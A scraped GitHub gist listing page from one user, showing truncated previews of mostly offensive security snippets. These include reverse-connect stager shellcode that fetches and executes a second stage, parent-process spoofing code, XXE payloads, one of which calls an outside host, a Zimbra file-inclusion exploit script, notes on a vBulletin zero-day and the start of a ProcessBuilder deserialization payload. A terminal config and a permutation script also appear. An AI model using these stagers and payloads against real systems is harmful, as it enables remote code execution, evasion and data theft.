Skip to content

Instantly share code, notes, and snippets.

🐜
Busy

John Troon JohnTroony

🐜
Busy
Block or report user

Report or block JohnTroony

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@JohnTroony
JohnTroony / reverse_stager_shellcode.asm
Last active Dec 2, 2019
x86 Shellcoding: PoC code for connect back shellcode that fetch a second stage shellcode and executes it.
View reverse_stager_shellcode.asm
; John (Troon) Ombagi
; Twitter/Github : @johntroony
global _start
section .text
_start:
; Create new stack frame
@JohnTroony
JohnTroony / reverse_staged_shellcode.c
Created Nov 25, 2019
Windows Shellcoding: PoC code for connect back shellcode that fetch a second stage shellcode and executes it.
View reverse_staged_shellcode.c
#include<stdio.h>
#include<winsock2.h>
//Winsock Library
#pragma comment(lib,"ws2_32.lib")
// John (Troon) Ombagi
// Twitter/Github : @johntroony
int main(int argc, char **argv){
View 2019_vbulletin_0day_info.txt
I have done some preliminary research into this bug and so far it does not seem like a backdoor. Just some really weird logic when handling routes, and rendering templates.
As to why widgetConfig[code] executes via a POST request, it is because of the following code located in /includes/vb5/frontend/applicationlight.php
$serverData = array_merge($_GET, $_POST);
if (!empty($this->application['handler']) AND method_exists($this, $this->application['handler']))
{
$app = $this->application['handler'];
@JohnTroony
JohnTroony / perm_repeat.py
Last active Sep 27, 2019
Permutation of numbers with repeating.
View perm_repeat.py
#!/usr/bin/python
# John (Troon) Ombagi
# jayombagi@gmail.com
# PR(n, k) = n^k ----> Permutation with repetition.
import itertools
import sys
@JohnTroony
JohnTroony / terminator.config
Created Aug 9, 2019
custom config for terminator terminal on Kali Linux
View terminator.config
[global_config]
enabled_plugins = TerminalShot, LaunchpadCodeURLHandler, APTURLHandler, LaunchpadBugURLHandler
[keybindings]
[profiles]
[[default]]
background_darkness = 0.83
background_type = transparent
cursor_color = "#aaaaaa"
show_titlebar = False
scrollback_infinite = True
View process_spoof.c
/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
/* spoof.exe explorer.exe calc.exe */
#include <windows.h>
#include <tlhelp32.h>
#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000
typedef struct _STARTUPINFOEX {
STARTUPINFO StartupInfo;
LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
View http-vuln-zimbra-lfi.nse
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
description = [[
A 0 day was been released on the 6th december 2013 by rubina119, and was patched in Zimbra 7.2.6.
The vulnerability is a local file inclusion that can retrieve any file from the server.
View escapetest.c
// Compile with -std=c11
#include <stdlib.h>
#include <stdarg.h>
#include <stdio.h>
#include <inttypes.h>
#include <string.h>
#include <limits.h>
#define MAX_STR_LEN 4095
View kryo-1.xml
<map>
<entry>
<groovy.util.Expando>
<expandoProperties>
<entry>
<string>hashCode</string>
<org.codehaus.groovy.runtime.MethodClosure>
<delegate class="groovy.util.Expando" reference="../../../.."/>
<owner class="java.lang.ProcessBuilder">
<command>
You can’t perform that action at this time.